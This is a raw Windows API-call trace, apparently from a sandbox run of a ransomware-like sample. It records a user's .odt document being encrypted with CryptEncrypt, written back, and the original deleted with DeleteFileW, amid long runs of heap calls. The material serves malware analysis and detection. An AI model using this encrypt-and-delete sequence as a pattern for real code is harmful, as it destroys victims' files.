returned 1 [0079.001] CryptGetKeyParam (in: hKey=0x41ac140, dwParam=0x7, pbData=0x43e2730, pdwDataLen=0x144e008, dwFlags=0x0 | out: pbData=0x43e2730*=0x6610, pdwDataLen=0x144e008*=0x4) returned 1 [0079.001] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae98 | out: hHeap=0x1780000) returned 1 [0079.001] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2890 | out: hHeap=0x1780000) returned 1 [0079.001] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb018 | out: hHeap=0x1780000) returned 1 [0079.001] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf70 | out: hHeap=0x1780000) returned 1 [0079.001] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0079.001] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb018 | out: hHeap=0x1780000) returned 1 [0079.001] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf70 | out: hHeap=0x1780000) returned 1 [0079.001] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28b0 | out: hHeap=0x1780000) returned 1 [0079.002] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafd0 | out: hHeap=0x1780000) returned 1 [0079.002] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cada8 | out: hHeap=0x1780000) returned 1 [0079.002] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2830 | out: hHeap=0x1780000) returned 1 [0079.002] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae38 | out: hHeap=0x1780000) returned 1 [0079.002] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cada8 | out: hHeap=0x1780000) returned 1 [0079.002] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0079.002] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caef8 | out: hHeap=0x1780000) returned 1 [0079.002] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf58 | out: hHeap=0x1780000) returned 1 [0079.002] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28d0 | out: hHeap=0x1780000) returned 1 [0079.002] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae68 | out: hHeap=0x1780000) returned 1 [0079.002] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2820 | out: hHeap=0x1780000) returned 1 [0079.002] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0079.002] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28a0 | out: hHeap=0x1780000) returned 1 [0079.002] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2800 | out: hHeap=0x1780000) returned 1 [0079.002] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2900 | out: hHeap=0x1780000) returned 1 [0079.002] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d01e8 | out: hHeap=0x1780000) returned 1 [0079.002] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafa0 | out: hHeap=0x1780000) returned 1 [0079.002] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0079.002] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caac0 | out: hHeap=0x1780000) returned 1 [0079.002] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad30 | out: hHeap=0x1780000) returned 1 [0079.002] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad60 | out: hHeap=0x1780000) returned 1 [0079.002] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caad8 | out: hHeap=0x1780000) returned 1 [0079.002] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab20 | out: hHeap=0x1780000) returned 1 [0079.002] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab38 | out: hHeap=0x1780000) returned 1 [0079.002] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac70 | out: hHeap=0x1780000) returned 1 [0079.002] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad78 | out: hHeap=0x1780000) returned 1 [0079.002] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cacd0 | out: hHeap=0x1780000) returned 1 [0079.002] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac88 | out: hHeap=0x1780000) returned 1 [0079.003] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab50 | out: hHeap=0x1780000) returned 1 [0079.003] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabe0 | out: hHeap=0x1780000) returned 1 [0079.003] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab68 | out: hHeap=0x1780000) returned 1 [0079.003] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab80 | out: hHeap=0x1780000) returned 1 [0079.003] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2920 | out: hHeap=0x1780000) returned 1 [0079.003] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2bd8 | out: hHeap=0x1780000) returned 1 [0079.003] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796ea8 | out: hHeap=0x1780000) returned 1 [0079.003] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabf8 | out: hHeap=0x1780000) returned 1 [0079.003] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac28 | out: hHeap=0x1780000) returned 1 [0079.003] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabb0 | out: hHeap=0x1780000) returned 1 [0079.003] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac40 | out: hHeap=0x1780000) returned 1 [0079.003] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad18 | out: hHeap=0x1780000) returned 1 [0079.003] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad00 | out: hHeap=0x1780000) returned 1 [0079.003] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafb8 | out: hHeap=0x1780000) returned 1 [0079.003] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9188 | out: hHeap=0x1780000) returned 1 [0079.003] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28f0 | out: hHeap=0x1780000) returned 1 [0079.003] PeekMessageW (in: lpMsg=0x144e63c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e63c) returned 0 [0079.003] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cadc0 | out: hHeap=0x1780000) returned 1 [0079.003] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea508 | out: hHeap=0x1780000) returned 1 [0079.003] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27b0 | out: hHeap=0x1780000) returned 1 [0079.003] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2820 | out: hHeap=0x1780000) returned 1 [0079.003] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae80 | out: hHeap=0x1780000) returned 1 [0079.003] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf70 | out: hHeap=0x1780000) returned 1 [0079.003] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e95f0 | out: hHeap=0x1780000) returned 1 [0079.003] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0079.003] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0079.004] PeekMessageW (in: lpMsg=0x144e63c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e63c) returned 0 [0079.004] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2900 | out: hHeap=0x1780000) returned 1 [0079.004] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0079.004] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0079.004] PeekMessageW (in: lpMsg=0x144e63c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e63c) returned 0 [0079.004] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0079.004] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2910 | out: hHeap=0x1780000) returned 1 [0079.004] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e88 | out: hHeap=0x1780000) returned 1 [0079.004] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28d0 | out: hHeap=0x1780000) returned 1 [0079.004] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0079.004] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0079.004] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0079.004] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf40 | out: hHeap=0x1780000) returned 1 [0079.004] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2900 | out: hHeap=0x1780000) returned 1 [0079.004] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2788 | out: hHeap=0x1780000) returned 1 [0079.004] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796f28 | out: hHeap=0x1780000) returned 1 [0079.004] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafb8 | out: hHeap=0x1780000) returned 1 [0079.004] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae68 | out: hHeap=0x1780000) returned 1 [0079.004] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfef0 | out: hHeap=0x1780000) returned 1 [0079.004] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2750 | out: hHeap=0x1780000) returned 1 [0079.004] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac780 | out: hHeap=0x1780000) returned 1 [0079.004] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8f00 | out: hHeap=0x1780000) returned 1 [0079.004] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cadd8 | out: hHeap=0x1780000) returned 1 [0079.004] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae50 | out: hHeap=0x1780000) returned 1 [0079.004] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad90 | out: hHeap=0x1780000) returned 1 [0079.004] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafe8 | out: hHeap=0x1780000) returned 1 [0079.004] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2830 | out: hHeap=0x1780000) returned 1 [0079.005] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2ae8 | out: hHeap=0x1780000) returned 1 [0079.005] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796d68 | out: hHeap=0x1780000) returned 1 [0079.006] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0079.006] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0079.006] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0079.006] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0079.006] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0079.006] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0079.007] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x43caf88, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0079.007] CryptEncrypt (in: hKey=0x41ac140, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x144e538*=0x18b87, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x144e538*=0x18b90) returned 1 [0079.007] CharLowerBuffW (in: lpsz="byte[101265]", cchLength=0xc | out: lpsz="byte[101265]") returned 0xc [0079.010] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0079.010] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0079.010] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0079.010] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x43cb1f8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0079.010] CryptEncrypt (in: hKey=0x41ac140, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x499a008*, pdwDataLen=0x144e538*=0x18b87, dwBufLen=0x18b90 | out: pbData=0x499a008*, pdwDataLen=0x144e538*=0x18b90) returned 1 [0079.011] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0079.011] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0079.011] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0079.013] WriteFile (in: hFile=0x298, lpBuffer=0x4908be0*, nNumberOfBytesToWrite=0x18b90, lpNumberOfBytesWritten=0x144ef3c, lpOverlapped=0x0 | out: lpBuffer=0x4908be0*, lpNumberOfBytesWritten=0x144ef3c*=0x18b90, lpOverlapped=0x0) returned 1 [0079.016] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0079.016] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0079.016] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0079.016] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0079.016] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x43cabf8, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0079.016] CryptDestroyKey (hKey=0x41ac140) returned 1 [0079.016] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0079.016] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0079.016] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0079.016] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0079.016] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0079.016] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0079.017] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0079.017] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0079.017] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0079.017] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0079.017] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x1797048, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0079.017] CryptReleaseContext (hProv=0x41a5250, dwFlags=0x0) returned 1 [0079.017] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0079.017] FreeLibrary (hLibModule=0x756e0000) returned 1 [0079.017] CloseHandle (hObject=0x258) returned 1 [0079.017] CloseHandle (hObject=0x298) returned 1 [0079.029] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\D2Y3tG\\cYT5WT.odt", nBufferLength=0x7fff, lpBuffer=0x143ef38, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents\\D2Y3tG\\cYT5WT.odt", lpFilePart=0x0) returned 0x2b [0079.029] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x60) returned 0x43595f0 [0079.029] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents\\D2Y3tG\\cYT5WT.odt" (normalized: "c:\\users\\fd1hvy\\documents\\d2y3tg\\cyt5wt.odt")) returned 0x20 [0079.029] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca610 [0079.029] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24d0 [0079.029] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca658 [0079.029] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e23a0 [0079.029] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca508 [0079.029] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2410 [0079.029] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5b0 [0079.029] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2470 [0079.029] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf658 [0079.029] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2430 [0079.029] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x60) returned 0x43596c0 [0079.029] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8f00 [0079.029] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8f48 [0079.030] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\D2Y3tG\\cYT5WT.odt", lpFindFileData=0x144ef80 | out: lpFindFileData=0x144ef80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf8c5f600, ftCreationTime.dwHighDateTime=0x1d5e646, ftLastAccessTime.dwLowDateTime=0x29ad7e90, ftLastAccessTime.dwHighDateTime=0x1d5e445, ftLastWriteTime.dwLowDateTime=0x29ad7e90, ftLastWriteTime.dwHighDateTime=0x1d5e445, nFileSizeHigh=0x0, nFileSizeLow=0x18b87, dwReserved0=0x356310, dwReserved1=0xdf0000, cFileName="cYT5WT.odt", cAlternateFileName="")) returned 0x41ac140 [0079.030] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\D2Y3tG\\cYT5WT.odt" (normalized: "c:\\users\\fd1hvy\\documents\\d2y3tg\\cyt5wt.odt")) returned 1 [0079.033] FindNextFileW (in: hFindFile=0x41ac140, lpFindFileData=0x144ef80 | out: lpFindFileData=0x144ef80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf8c5f600, ftCreationTime.dwHighDateTime=0x1d5e646, ftLastAccessTime.dwLowDateTime=0x29ad7e90, ftLastAccessTime.dwHighDateTime=0x1d5e445, ftLastWriteTime.dwLowDateTime=0x29ad7e90, ftLastWriteTime.dwHighDateTime=0x1d5e445, nFileSizeHigh=0x0, nFileSizeLow=0x18b87, dwReserved0=0x356310, dwReserved1=0xdf0000, cFileName="cYT5WT.odt", cAlternateFileName="")) returned 0 [0079.034] FindClose (in: hFindFile=0x41ac140 | out: hFindFile=0x41ac140) returned 1 [0079.034] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8f48 | out: hHeap=0x1780000) returned 1 [0079.034] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2380 | out: hHeap=0x1780000) returned 1 [0079.034] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5e0 | out: hHeap=0x1780000) returned 1 [0079.034] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24a0 | out: hHeap=0x1780000) returned 1 [0079.034] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43595f0 | out: hHeap=0x1780000) returned 1 [0079.034] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2460 | out: hHeap=0x1780000) returned 1 [0079.035] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca490 | out: hHeap=0x1780000) returned 1 [0079.035] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca778 | out: hHeap=0x1780000) returned 1 [0079.035] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf608 | out: hHeap=0x1780000) returned 1 [0079.035] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0079.035] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac600 | out: hHeap=0x1780000) returned 1 [0079.035] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0079.035] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9338 | out: hHeap=0x1780000) returned 1 [0079.035] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1a8 | out: hHeap=0x1780000) returned 1 [0079.035] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca190 | out: hHeap=0x1780000) returned 1 [0079.035] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca430 | out: hHeap=0x1780000) returned 1 [0079.035] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2400 | out: hHeap=0x1780000) returned 1 [0079.035] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf5e0 | out: hHeap=0x1780000) returned 1 [0079.035] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca250 | out: hHeap=0x1780000) returned 1 [0079.035] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24c0 | out: hHeap=0x1780000) returned 1 [0079.035] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf590 | out: hHeap=0x1780000) returned 1 [0079.035] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x42d9ab0 | out: hHeap=0x1780000) returned 1 [0079.035] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2350 | out: hHeap=0x1780000) returned 1 [0079.035] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca418 | out: hHeap=0x1780000) returned 1 [0079.035] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3e8 | out: hHeap=0x1780000) returned 1 [0079.035] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf5b8 | out: hHeap=0x1780000) returned 1 [0079.035] PeekMessageW (in: lpMsg=0x144f534, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f534) returned 0 [0079.035] PeekMessageW (in: lpMsg=0x144f534, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f534) returned 0 [0079.035] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2460 [0079.035] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf590 [0079.035] CharUpperBuffW (in: lpsz="ENCRYPTFILE", cchLength=0xb | out: lpsz="ENCRYPTFILE") returned 0xb [0079.035] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf590 | out: hHeap=0x1780000) returned 1 [0079.036] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2460 | out: hHeap=0x1780000) returned 1 [0079.036] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf590 [0079.036] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2350 [0079.036] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf5b8 [0079.036] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca190 [0079.036] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2510 [0079.036] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1a8 [0079.036] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2520 [0079.036] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796fc8 [0079.036] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca250 [0079.036] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24c0 [0079.036] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x50) returned 0x4369f80 [0079.036] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca250 | out: hHeap=0x1780000) returned 1 [0079.036] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2400 [0079.036] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2400 | out: hHeap=0x1780000) returned 1 [0079.036] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3e8 [0079.036] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc0) returned 